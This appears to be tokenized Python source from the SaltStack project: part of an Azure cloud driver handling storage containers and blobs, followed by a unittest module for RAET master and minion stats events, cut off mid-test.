container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_id = kwargs . 
get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_storage_container_acl = show_storage_container_acl <EOL> def set_storage_container_acl ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> data = storage_conn . set_container_acl ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> signed_identifiers = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_public_access = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return { '<STR_LIT>' : '<STR_LIT>' } <EOL> except AzureConflictHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> def delete_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . delete_container ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> fail_not_exist = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def lease_storage_container ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> lease_actions = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if kwargs . 
get ( '<STR_LIT>' , None ) not in lease_actions : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' . format ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( lease_actions ) <EOL> ) <EOL> ) <EOL> if kwargs [ '<STR_LIT>' ] != '<STR_LIT>' and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( kwargs [ '<STR_LIT>' ] ) <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . lease_container ( <EOL> container_name = kwargs [ '<STR_LIT:name>' ] , <EOL> x_ms_lease_action = kwargs [ '<STR_LIT>' ] , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_duration = kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> x_ms_lease_break_period = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_proposed_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def list_blobs ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> return salt . utils . msazure . list_blobs ( storage_conn = storage_conn , ** kwargs ) <EOL> def show_blob_service_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_blob_service_properties ( <EOL> timeout = kwargs . 
get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> get_blob_service_properties = show_blob_service_properties <EOL> def set_blob_service_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_blob_service_properties ( <EOL> storage_service_properties = kwargs [ '<STR_LIT>' ] , <EOL> timeout = kwargs . get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def show_blob_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> try : <EOL> data = storage_conn . get_blob_properties ( <EOL> container_name = kwargs [ '<STR_LIT>' ] , <EOL> blob_name = kwargs [ '<STR_LIT>' ] , <EOL> x_ms_lease_id = kwargs . 
get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> except AzureMissingResourceHttpError : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> return data <EOL> get_blob_properties = show_blob_properties <EOL> def set_blob_properties ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> data = storage_conn . get_blob_properties ( <EOL> container_name = kwargs [ '<STR_LIT>' ] , <EOL> blob_name = kwargs [ '<STR_LIT>' ] , <EOL> x_ms_blob_cache_control = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_type = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_md5 = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_encoding = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_language = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_lease_id = kwargs . get ( '<STR_LIT>' , None ) , <EOL> x_ms_blob_content_disposition = kwargs . 
get ( '<STR_LIT>' , None ) , <EOL> ) <EOL> return data <EOL> def put_blob ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> return salt . utils . msazure . put_blob ( storage_conn = storage_conn , ** kwargs ) <EOL> def get_blob ( kwargs = None , storage_conn = None , call = None ) : <EOL> '''<STR_LIT>''' <EOL> if call != '<STR_LIT>' : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> ) <EOL> if kwargs is None : <EOL> kwargs = { } <EOL> if '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' not in kwargs : <EOL> raise SaltCloudSystemExit ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in kwargs and '<STR_LIT>' not in kwargs : <EOL> raise SaltCloudSystemExit ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> if not storage_conn : <EOL> storage_conn = get_storage_conn ( conn_kwargs = kwargs ) <EOL> return salt . utils . msazure . get_blob ( storage_conn = storage_conn , ** kwargs ) <EOL> def query ( path , method = '<STR_LIT:GET>' , data = None , params = None , header_dict = None , decode = True ) : <EOL> '''<STR_LIT>''' <EOL> certificate_path = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> subscription_id = config . 
get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> management_host = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , <EOL> __opts__ , <EOL> search_global = False , <EOL> default = '<STR_LIT>' <EOL> ) <EOL> requests_lib = config . get_cloud_config_value ( <EOL> '<STR_LIT>' , <EOL> get_configured_provider ( ) , __opts__ , search_global = False <EOL> ) <EOL> url = '<STR_LIT>' . format ( <EOL> management_host = management_host , <EOL> subscription_id = subscription_id , <EOL> path = path , <EOL> ) <EOL> if header_dict is None : <EOL> header_dict = { } <EOL> header_dict [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> result = salt . utils . http . query ( <EOL> url , <EOL> method = method , <EOL> params = params , <EOL> data = data , <EOL> header_dict = header_dict , <EOL> port = <NUM_LIT> , <EOL> text = True , <EOL> cert = certificate_path , <EOL> requests_lib = requests_lib , <EOL> decode = decode , <EOL> decode_type = '<STR_LIT>' , <EOL> ) <EOL> if '<STR_LIT>' in result : <EOL> return result [ '<STR_LIT>' ] <EOL> return </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> import unittest2 as unittest <EOL> else : <EOL> import unittest <EOL> import time <EOL> from ioflo . base . consoling import getConsole <EOL> console = getConsole ( ) <EOL> from ioflo . aid . odicting import odict <EOL> from ioflo . test import testing <EOL> from raet . abiding import ns2u <EOL> from raet . lane . stacking import LaneStack <EOL> from raet . road . stacking import RoadStack <EOL> from raet . stacking import Stack <EOL> from salt . utils . event import tagify <EOL> from salt . daemons . flo import core <EOL> from salt . daemons . test . plan import actors <EOL> def setUpModule ( ) : <EOL> console . reinit ( verbosity = console . Wordage . concise ) <EOL> def tearDownModule ( ) : <EOL> pass <EOL> class StatsEventerTestCase ( testing . FrameIofloTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( StatsEventerTestCase , self ) . setUp ( ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( StatsEventerTestCase , self ) . tearDown ( ) <EOL> def testMasterContextSetup ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterContextSetup . __doc__ ) ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . 
frame . reacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> self . assertDictEqual ( act . actor . Ioinits , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertIsInstance ( act . actor . lane_stack . value , LaneStack ) <EOL> self . assertIsInstance ( act . actor . road_stack . value , RoadStack ) <EOL> self . frame . recur ( ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> def testMasterRoadStats ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterRoadStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> statsReq . 
append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { '<STR_LIT>' : { '<STR_LIT:src>' : [ None , '<STR_LIT>' , None ] , <EOL> '<STR_LIT>' : [ None , None , '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : { '<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> def testMasterLaneStats ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterLaneStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> statsReq . 
append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { '<STR_LIT>' : { '<STR_LIT:src>' : [ None , '<STR_LIT>' , None ] , <EOL> '<STR_LIT>' : [ None , None , '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : tag , <EOL> '<STR_LIT:data>' : { '<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMasterStatsWrongMissingTag ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterStatsWrongMissingTag . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = '<STR_LIT>' <EOL> self . 
assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , testStack . local . name , None ) } } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMasterStatsUnknownRemote ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterStatsUnknownRemote . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . 
value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> unknownName = '<STR_LIT>' <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( None , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( None , unknownName , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMasterStatsNoRequest ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMasterStatsNoRequest . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> laneStack . value . stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> self . assertEqual ( len ( statsReq ) , <NUM_LIT:0> ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . 
close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionContextSetup ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionContextSetup . __doc__ ) ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . enacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . assertIn ( act , self . frame . reacts ) <EOL> self . assertEqual ( act . actor , "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> self . assertDictEqual ( act . actor . Ioinits , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertTrue ( hasattr ( act . actor , '<STR_LIT>' ) ) <EOL> self . assertIsInstance ( act . actor . lane_stack . value , LaneStack ) <EOL> self . assertIsInstance ( act . actor . road_stack . value , RoadStack ) <EOL> self . frame . recur ( ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . 
server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> def testMinionRoadStats ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionRoadStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> minionName = roadStack . value . local . name <EOL> masterName = testStack . local . name <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { u'<STR_LIT>' : { u'<STR_LIT:src>' : [ ns2u ( minionName ) , u'<STR_LIT>' , None ] , <EOL> u'<STR_LIT>' : [ ns2u ( masterName ) , None , u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ns2u ( tag ) , <EOL> u'<STR_LIT:data>' : { u'<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . 
close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionLaneStats ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionLaneStats . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> minionName = roadStack . value . local . name <EOL> masterName = testStack . local . name <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack 